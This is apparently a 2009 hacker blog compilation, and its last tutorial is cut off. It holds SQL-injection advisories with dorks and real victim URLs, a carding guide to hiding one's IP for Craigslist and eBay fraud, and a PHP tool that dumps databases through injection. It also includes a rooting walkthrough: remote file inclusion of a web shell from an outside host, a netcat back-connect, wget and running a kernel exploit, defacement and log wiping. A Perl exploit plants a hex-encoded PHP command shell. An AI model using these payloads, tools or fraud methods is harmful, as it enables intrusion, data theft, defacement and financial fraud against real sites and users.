[+] version : 1.1.0 - 1.2
[+] Vulnerability : SQL injection
[+] Dork : xxxxxxx
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_fastball&league=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11+f
rom+jos_users--



#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,devil_nongkrong and YOU!!

[ NOTE ]

[+] thanks to dad and mom .... muach ..
[+] thanks to uncle tukulesto, who always keeps me company and never gets bored of me .. hahaha
[+] aurakasih, why are you so hard to reach ?? .. haha

Wednesday, September 23, 2009

How to hide your IP

I know many of you hiding ip's via Socks or poxy..that's shit...sorry but if they have java they can get ur ip even if u are connected thrhough a socks.

So. If u have a good connection at internet you can use this softwares:

1. Local ip > AOL ( using aol 9.1 or AOL desktop 10.)
To configure your ip to use AOL USA ip class you have to do go to:
Open Aol 9.1 > Connection options > Advanced Broadband Settings > continue > & at Broadband u will see something " You are curently editing settings for Broadband, than click and go down to Add a Broadband profile > Put any profil name you want > than down to Connection Type click on Home Network. and SAVE

This is how you get IP privat from AOL.

BUT what you guys didnt know and I am 100% sure about that...AOL have their ip in black list. So to have a PURE and NON blacklisted IP from AOL after you have did this setup you have to:

Connect using this settings, test your ip at http://www.showmyip.com/?version=full and see if ur ip address is from United States verified, if yes than disconect close AOL from taskmanager anything that AOL have than

Download AOL DEsktop ( AOL 10 ), install and make the same connection settings IF those settings are not already same as AOL 9.1. after that DONT open AOL desktop

Open AGAIN aol 9.1 from program files > aol 9.1 > waol.exe than try to connect, You will get an error first time but second time it will work

Usualy 70% of times it will give u an ip with 172.191, 172.192, 172.193 many of those IP's are not in blacklist

For those who is making fake auctions on Craiglist, you might need to know this way u will NOT have to register and make phone registration...YOU dont need to register..you can put FREE POST on AUTOS with no phone required or no Craigslist account

For those who Are making fraud on Ebay same thing...this non blacklist aol put you on website in like 2 hours instead of 8 or not puting u at all on ebay Autos.


Some times XP or VISTA dont kick AOL even if u are kicked from task manager so...Better on carding make a new User on your computer for example
AOL1 pass AOL1. than open AOL 9.1 as I said only after you have downloaded and instaled AOL 10 and than u will see first time NON BLACK listed AOL IP :D pure and simple...after you have done and you have disconected and reconected and didnt gave you a non black listed IP, try few more times 1 2, if not than delete user aol1 and make aol2 and so on :) NEW ip non black listed...

To test if your ip is in black list the easyest way go to this link

https://post.craigslist.org/chi/S/cto/

If you get this "You need to have a craigslist account to post to cars & trucks - by owner on chicago craigslist. " than be sure ur ip is 100% in BLACK LIST.

If you got a page with GREEN and you can add your description on your "car" than your ip is not blacklisted and can be used to a very fucked up site that have the biggest security in the world and YOU can card that site :D I made testes so i am sure about what I am saying :P

=================================

2. Local IP > VPN

www.findnot.com < I used a Japan credit card and i bought it for a year and worked...still working and I am still connected to this
Findnot have many servers all over the world and there are fast servers

3. Local IP > TOR

This tool is more than great if you dont trust me do this test and you will see what TOR can provide :)
Also many of you know that TOR connect every time from different 3 IP from DIfferent country's

So far so good...BUT why if you can Change your First IP and Last IP so every time you will Re-connect just from 1 ip that is in the middle and not from 3.

FOR low internet connections.

So for testing to see HOW private is TOR do this..

first open again from your Local IP http://www.showmyip.com/?version=full > AND down at:

Computer/Device Properties (as of August 21, 2008 07:00 UTC) you will see your computer DATA, than open TOR put as socks 127.0.0.1 TOR port and than OPEN again this website...YOU will see the data from there was changed...SO when you are doing CARDING...even if you are not connected from your IP address and u are using all kind of softwares to change your IP..this DATA will remaine 100% sure in their database if they asking for this data...BUT with TOR...no more information about your computer: Operating System Platform, Screen Width: Screen Height: etc.

Now to easy your things and also using TOR on all the softwares you are open use

Proxifier, So first open TOR connect to TOR network than Open proxifier add in proxifier 127.0.0.1:TORport and than. Open Firefox or Iexplore BUT dont click on socks let them choice ip from local..and you will see IP Proxifier take ip from TOR

=============================

Now for those who are fucked up on their mind and are very well scared...You can use this:

Local IP > VPN > Proxifier + TOR + Remote desktop connection or socks or anything u guys want. AOL or CS wont work with Proxifier + tor

or

Local IP > VPN > AOL > TOR and u can change tor's last ip every time u want but modify the config


====

Usualy i use just VPN but if I want to do something or to enter to a private network than I use Local IP > VPN > Proxifier + TOR + something else :D

Hope I have helped you a little bit with this tutorial.

p.s: dont use socks or proxy... from LOCAL IP > socks ...this is shit. use LOCAL IP > VPN or TOR > socks :D much more safe than just with socks on local ip even if ur connection is slow try to find a good VPN and than to a socks or proxy


Have Fun on carding/hacking/cracking/ or whatever u guys are doing and want to hide ur ip :D

Saturday, September 19, 2009

Happy Eid-Ul Fitr 1430

Words by words here might hurt you once even more. In case, We need to apologize to you on it.



Translation (lol) :

I, MATTHEWS, WISH YOU

A HAPPY EID AL-FITR 1430 H

PLEASE FORGIVE ME, BODY AND SOUL


IMS SiteManager Blind SQL Injection Vuln

[o]------------------------------------------------------------------------------------[x]
| Blind SQL Injection Vulnerability
|
[o]------------------------------------------------------------------------------------[o]
| Software : IMS SiteManager
|
| Vendor : www.sitemanager.ims.net
|
| Date : 13 sept 2009
|
| Author : zxvf
|
| Contact : paddy[at]antisecurity[dot]org
|
[o]------------------------------------------------------------------------------------[o]

[?] Google Dork

"Powered by IMS SiteManager"

[?] Exploit

http://[site]/index.php?storecategory_id=

[?] Proof of Concept

https://www.rainfordane.com/order/index.php?storecategory_id=247
https://www.downtownmadison.org/store/index.php?storecategory_id=223

[o]------------------------------------------------------------------------------------[x]
| Greetz
|
[o]------------------------------------------------------------------------------------[o]
| AntiSecurity Crew
|
| Mainhack Crew
|
| Nob0dy Crew
|
| c0li, OoN_Boy, NoGe, paman, pizzyroot, noname, angela, eminem, xx_user,
|
| Special for Dipsy
|
| Armageddon Team, and all indonesian hacker!
|
| BeHave oR BeGone !!!
|
[o]------------------------------------------------------------------------------------[o]

ExpressLink™ SEO Blind SQL Injection Vuln

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Details *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> type :: ( menu_list.php?cid= ) Blind Sql Injection Vulnerability

<>>><<>>> author :: ^s0n_g0ku^

<>>><<>>> Contact :: dh_4n[at]ymail[dot]com

<>>><<>>> Site :: http://xcode.or.id/

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Script information *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> script :: ExpressLink™ SEO

<>>><<>>> Vendor :: http://www.wevioexpress.com/

<>>><<>>> dork :: use your imagination

<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>
* Exploit *
<>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>><>>><<>>>

<>>><<>>> Exploit ::

http://www.site.com/menu_list.php?cid=381

<>>><<>>> Examp ::

http://www.poloagawa.com/menu_list.php?cid=381+and+1=1 <<< Thrue
http://www.poloagawa.com/menu_list.php?cid=381+and+1=2 <<< false

http://www.empireallergy.com/menu_list.php?cid=1+and+1=1 <<< Thrue
http://www.empireallergy.com/menu_list.php?cid=1+and+1=2 <<< false

<>>><<>>> Admin Login Page ::

http://site.com/admin/

Enjoy That

Thursday, September 17, 2009

BRS Webweaver Version 1.33 /Scripts access restriction bypass

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : The ISAPI/CGI path is [%installdirectory%/scripts], and through HTTP the alias is [http://[host]/scripts]. The access security check is that if the attacker tries to access /scripts, a 404 Error response occurs! Now to bypass it and check the directory listing [that is, if Directory Browsing is allowed in the server configuration!], just copy and paste the exploit URL!
This is the reason this exploit is not called a Directory Listing Exploit!

[*] Exploitation :

[+] http://[host]/scripts/%bg%ae%bg%ae/.exe

How to Use John the Ripper

In this config we are going to use the John the Ripper password cracker to enhance the security of your server by choosing a proper password for your system. This config assumes that you have already installed John the Ripper. If you haven’t installed it, please go to "Install Password cracker - John the Ripper" now.

Create test user

For testing purposes you should create a testing user “johnripper” with password “password”.

adduser johnripper

Crack password

John the Ripper needs to access the shadow file in order to be able to crack a password. You need to run “john” as superuser “root”. Be sure that the john binary is in your path, or that you are in the directory where the john binary resides. Try and see how long it will take to crack your super secure password of: “password”

./john -users:johnripper /etc/shadow

To guess a password in 0 seconds is an excellent time. Try making it more difficult: change the password for user “johnripper” to “password1” and attempt to crack the password again:

What if you changed the password to “password10”? How long will it take to crack the password now? Who knows, I gave up after 23 hours. Apparently my linuxbox is not as powerful as I thought; if you get a result please let me know.

Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)

/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything

At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/

main: http://grsecurity.net/~spender/therebel.tgz
back: http://milw0rm.com/sploits/2009-therebel.tgz

Monday, September 14, 2009

IndexScript 3.0 SQL Injection Vuln

[o] IndexScript 3.0 SQL Injection Vulnerability
Software : IndexScript version 3.0
Vendor : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author : NoGe
Home : http://antisecurity.org

[o] Vulnerable file
more.php

[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]

[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--

[o] Dork
"powered by IndexScript"

Saturday, September 12, 2009

Sourcode sqltools.php

code sql tools

<?
set_time_limit(0);
error_reporting(0);
$fungsi=strip_tags($_POST['fungsi']);
$url=strip_tags($_POST['url']);
$db=strip_tags($_POST['db']);
$table=strip_tags($_POST['table']);
$column=strip_tags($_POST['column']);
$start=strip_tags($_POST['start']);
$stop=strip_tags($_POST['stop']);
$target=strip_tags($_POST['target']);
?>
<title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
<head>
</head>
<script>
function show(id){
document.getElementById(id).style.display="block";
}
function hide(id){
document.getElementById(id).style.display="none";
}
function db(){show("db");hide("table");hide("column");hide("dump");hide("findcol");}
function table(){hide("db");show("table");hide("column");hide("dump");hide("findcol");}
function column(){hide("db");hide("table");show("column");hide("dump");hide("findcol");}
function dump(){hide("db");hide("table");hide("column");show("dump");hide("findcol");}
function findcol(){hide("db");hide("table");hide("column");hide("dump");show("findcol");}
function help(){alert("This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info");}
</script>
<style>
#db,#table,#column,#dump,#findcol {display:none;}
</style>
<a href="javascript:findcol();">FindCol</a> |
<a href="javascript:db();">Database</a> |
<a href="javascript:table();">Table</a> |
<a href="javascript:column();">Column</a> |
<a href="javascript:dump();">Dump</a> |
<a href="javascript:help();">Help</a> |
<b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a
href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
<p>

<div id=db>
<form method=post>
<input type=hidden name=fungsi value=db>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
<tr><td><td><td><input type=submit value="Show Databases"></table>
</form>
</div>
<div id=table>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
<input type=hidden name=fungsi value=table>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>"><br>
<tr><td>DB<td> : <td><input name=db value="<?=$db;?>"><br>

<tr><td><td><td><input type=submit value="Show Table"></table>
</form>
</div>
<div id=column>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
<input type=hidden name=fungsi value=column>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
<tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
<tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
<tr><td><td><td><input type=submit value="Show Column"></table>
</form>
</div>
<div id=dump>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
<input type=hidden name=fungsi value=dump>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
<tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
<tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
<tr><td>Column<td> : <td><input name=column value="<?=$column;?>"> ex : email,passwd,card_num
<tr><td>Start<td> : <td><input name=start value="<?=$start;?>"> **start from field number**
<tr><td>Stop<td> : <td><input name=stop value="<?=$stop;?>"> **stop field number**
<tr><td><td><td><input type=submit value="Dump"></table>
</form>
</div>
<div id=findcol>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
Target <input name=target size=100 value="<?=$target;?>"><input type=submit value=test>
</form>
</div>
<?
/* GET DATABASE NAME */
if(isset($url) && $fungsi=="db"){
$countdb="concat(0x6b30706c30,count(schema_name),0x6b30706c30)";
$showdb="concat(0x6b30706c30,schema_name,0x6b30706c30)";
$showdb2="+from+information_schema.schemata";
$end="--";
//print "$url <br>";
$url_1=str_replace("k0pl0",$countdb,$url);
$url_2=$url_1.$showdb2.$end;
$url_3=str_replace("k0pl0",$showdb,$url);
$data=file_get_contents($url_2);
$jumlah=antara($data,"k0pl0","k0pl0");
echo "$jumlah database<br>";
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$showdb2."+limit+$i,1".$end;
$datax=file_get_contents($urlx);
$namadatabase=antara($datax,"k0pl0","k0pl0");
echo "$nomor : $namadatabase <br>";
flush();
}
}

/* GET TABLE NAME */
if(isset($url) && $fungsi == "table"){
$query="concat(0x6b30706c30,count(table_name),0x6b30706c30)";
$next="+from+information_schema.tables";
$query2="concat(0x6b30706c30,table_name,0x6b30706c30)";
$end="--";
if(isset($db) && $db !==""){
$next=$next."+where+table_schema=0x".bin2hex($db);
}

$url_1=str_replace("k0pl0",$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace("k0pl0",$query2,$url);
//echo "inject : $url_2";
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,"k0pl0","k0pl0");
echo "<br>$jumlah tables<br>";
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next."+limit+$i,1".$end;
$datax=file_get_contents($urlx);
$namatable=antara($datax,"k0pl0","k0pl0");
echo "$nomor : $namatable <br>";
flush();
}
}
// GET COLUMN NAME LIST
if(isset($url) && $url3 !== "" && isset($table) && $table !== "" && $fungsi == "column"){
$query="concat(0x6b30706c30,count(column_name),0x6b30706c30)";
$next="+from+information_schema.columns+where+table_name=0x".bin2hex($table);
$query2="concat(0x6b30706c30,column_name,0x6b30706c30)";
$end="--";
if(isset($db) && $db !==""){
$next=$next."+and+table_schema=0x".bin2hex($db);
}
$url_1=str_replace("k0pl0",$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace("k0pl0",$query2,$url);
//echo "inject : $url_2";
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,"k0pl0","k0pl0");
echo "<br>$jumlah Columns<br>";
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next."+limit+$i,1".$end;
//echo $urlx;
$datax=file_get_contents($urlx);
$namatable=antara($datax,"k0pl0","k0pl0");
echo "$nomor : $namatable <br>";
flush();
}
}

// DUMB DATA
if($fungsi=="dump" && isset($url) && $url !== "" && isset($table) && $table !== "" && isset($column) && $column !=="" ){
$query="concat(0x6b30706c30,count(*),0x6b30706c30)";
$next="+from+$table";
$query2="concat(0x6b30706c30,concat_ws(0x203a20,".$column."),0x6b30706c30)";
$end="--";
if(isset($db) && $db !==""){
$next="+from+$db.$table";
}
$url_1=str_replace("k0pl0",$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace("k0pl0",$query2,$url);
//echo "inject : $url_2";
$data=file_get_contents($url_2);
//echo $data;
$jumlah=antara($data,"k0pl0","k0pl0");
echo "<br>$jumlah data<br>";
for($i=$start;$i<=$stop;$i++){
flush();
$nomor=$i;
$urlx=$url_3.$next."+limit+$i,1".$end;
//echo $urlx;
$datax=file_get_contents($urlx);
$namatable=antara($datax,"k0pl0","k0pl0");
echo "$nomor : $namatable <br>";
flush();
}
}
// GET MAGIC NUMBER
if(isset($target) && $taget !== ""){
echo "trying... 1 ";
$targetx=$target."-1+union+select+0x6b30706c30";
$targety=$target."-1+union+select+1";
$injek="";
$y="";
$end="--";
for($i=1;$i<100;$i++){
flush();
$y .= ",".($i+1);
$oon=($i+1)."oon";
$hexx=bin2hex($oon);
$injek.=",0x6b30706c30".$hexx;
$link=$targetx.$injek;
$akhir = $link.$end;
//echo $akhir;
echo ($i+1)." ";
$data=file_get_contents($akhir);
if(eregi("k0pl0",$data)){
$magicnumber=antara($data,"k0pl0","oon");
$mbuh=",".$magicnumber.",";
$zzz=str_replace($mbuh,",k0pl0,",$targety.$y);
$linkinjek=$targety.$y.$end;
echo "<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\"_blank\">$linkinjek</a><p><b>info</b><br>";
$ambilinfo=str_replace("k0pl0","concat(0x6b30706c30,concat_ws(0x3c62723e,concat(0x64617461626173652076657273696f6e203a20,version()),concat(0x64617461626173652075736572203a20,user()),concat(0x6461746162617365206e616d65203a20,database())),0x6b30706c30)",$zzz).$end;
$datainfo=file_get_contents($ambilinfo);
$info=antara($datainfo,"k0pl0","k0pl0");
echo $info;
break;
}
if($i=="99"){echo "<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :)<b></font>";}
flush();
}
}

function antara($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);

Local Root via NetCat

take from BABY CORP



You will need:
Quote:
- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF.Suppose that we have found a site with RFI vulnerability:

Code:

http://www.hackedsite.com/folder/index.html?page=

e can run shell exploiting Remote File Inclusion, as follows:

Code:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname – a in Command line.

To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder

In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way:

We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd

After we will go to the NetCat directory:

Quote:

cd C:\Program Files\Netcat
And we type the following command:
Quote:
nc -n -l -v -p 11456
NetCat respond: listening on [any] 11456 …

In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11456 …

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don’t have the correct permissions.List of the exploits/kernel:

Quote:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

milw0rm (Try Search: “linux kernel”)

Other sites: www.packetstormsecurity.org | www.milw0rm.com or try Googlin’ you can find ‘em all ;-)

We can find writable folders/files by typing:
Code:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type:
Code:

cd /tmp

To download the local root exploit we can use a download command for linux like wget.

For example:
Quote:
wget http://www.yoursite.com/localroot/h00lyshit.c
where http://www.yoursite.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit before the compile)

For the h00lyshit we must type:
Code:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:
Code:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:
Code:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:
Code:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:
Code:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner.

Agoko CMS <= 0.4 remote commands execution exploit

#!/usr/bin/perl

print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

~;


#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
# #
# -------------------------------------------------- #
# Agoko CMS <= 0.4 remote commands execution exploit #
# by staker #
# mail: staker[at]hotmail[dot]it #
# -------------------------------------------------- #
# #
# [*] Usage -> perl [xpl.pl] [host] [path] #
# [*] Example -> perl agk.pl localhost /Agoko #
# #
# shell already exists. #
# #
# Agoko[shell]:~$ uname -n -r #
# #
# death 2.6.27-7-generic #
#######################################################


use IO::Socket;
use LWP::Simple;


my $host = shift;
my $path = shift || exit(0);


check_shell($host,$path);


sub check_shell() {
my $host = $_[0];
my $path = $_[1] || die $!;

my $packet = "GET /$path/content/shell_vup.php HTTP/1.1\r\n".
"Host: $host\r\n".
"Cookie: bany=love_me\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Connection: close\r\n\r\n";

if (give_kt($host,$packet) =~ /bany wtf/i) {
print "[*] shell already exists.\n";
load_cmd($host,$path);
}
else {
print "[*] exploiting..\n";
inject_shell($host,$path);
}
}


sub inject_shell() {
my ($host,$path) = @_;

my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72".
"\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45".
"\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20".
"\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28".
"\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29".
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73".
"\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73".
"\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64".
"\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73".
"\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28".
"\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20".
"\x20\x20\x20\x20\x3F\x3E\x20";


my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";

my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
"Cookie: bany=love_me\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".length($data)."\r\n".
"Connection: close\r\n\r\n".
$data;

if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i)
{
load_cmd($host,$path)
}
else
{
die "[*] Exploit failed.\n";
}

}


sub load_cmd() {
my $host = $_[0];
my $path = $_[1];

while (1)
{
print "\nAgoko[shell]:~\$ ";
chomp (my $cmd = );

exit(0) if $cmd =~ /^(exit|quit|out)+$/i;

getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
}
}


sub give_kt() {
my $input = $_[0];
my $heads = $_[1] || die $!;

my $result;
my $socket = IO::Socket::INET->new(
PeerAddr => $input,
PeerPort => 80,
Proto => 'tcp'
) || die $!;

$socket->send($heads);

while (<$socket>) { $result .= $_; }

return $result;
}

Finding vulnerabilities in PHP scripts FULL ( with examples )

Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08[at]gmail[dot]com
Contents :

1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example
3.2 - How to fix
4) Local File Inclusion
4.0 - Basic example
4.1 - Simple example
4.2 - How to fix
5) Local File Disclosure/Download
5.0 - Basic example
5.1 - Simple example
5.2 - How to fix
6) SQL Injection
6.0 - Basic example
6.1 - Simple example
6.2 - SQL Login Bypass
6.3 - How to fix
7) Insecure Cookie Handling
7.0 - Basic example
7.1 - Simple example
7.2 - How to fix
8) Remote Command Execution
8.0 - Basic example
8.1 - Simple example
8.2 - Advanced example
8.3 - How to fix
9) Remote Code Execution
9.0 - Basic example
9.1 - Simple example
9.2 - How to fix
10) Cross-Site Scripting
10.0 - Basic example
10.1 - Another example
10.2 - Simple example
10.3 - How to fix
11) Authentication Bypass
11.0 - Basic example
11.1 - Via login variable
11.2 - Unprotected Admin CP
11.3 - How to fix
12) Insecure Permissions
12.0 - Basic example
12.1 - Read the users/passwords
12.2 - Download backups
12.3 - INC files
12.4 - How to fix
13) Cross Site Request Forgery
13.0 - Basic example
13.1 - Simple example
13.2 - How to fix
14) Shoutz


1) In this tutorial I will show you how you can find vulnerabilities in PHP scripts. I will not explain
how to exploit the vulnerabilities; it is pretty easy and you can find info around the web. All the
examples, except the basic example in each category, were found in different scripts.


2) First, install Apache, PHP and MySQL on your computer. Additionally you can install phpMyAdmin.
You can install WAMP server, for example; it has all in one. Most vulnerabilities need special conditions
to work, so you will need to set up the PHP configuration file (php.ini) properly. I will show you what
configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disable_functions = N/A ( none, we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( when on, this escapes ' " \ and NULs with a backslash and we don't want that )
short_open_tag = on ( some scripts are using short tags, better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors, maybe some undeclared variables? )

How to proceed : First, create a database to be used by the different scripts. Install the script on
localhost and start the audit over the source code. If you find something, open the web browser and
test it; maybe you are wrong.


3) Remote File Inclusion


- Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )


PHP has 4 functions through which you can include code.

require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include - includes and evaluates the specified file.
include_once - includes and evaluates the specified file during the execution of the script.


3.0 - Basic example


- Tips : some scripts don't accept "http" in variables; the word "http" is forbidden, so
you can use "https" or "ftp".

- Code snippet from test.php

-----------------------------------------------
<?php
$pagina=$_GET['pagina'];
include $pagina;
?>
-----------------------------------------------

- If we access the page we get some errors and some warnings ( not pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

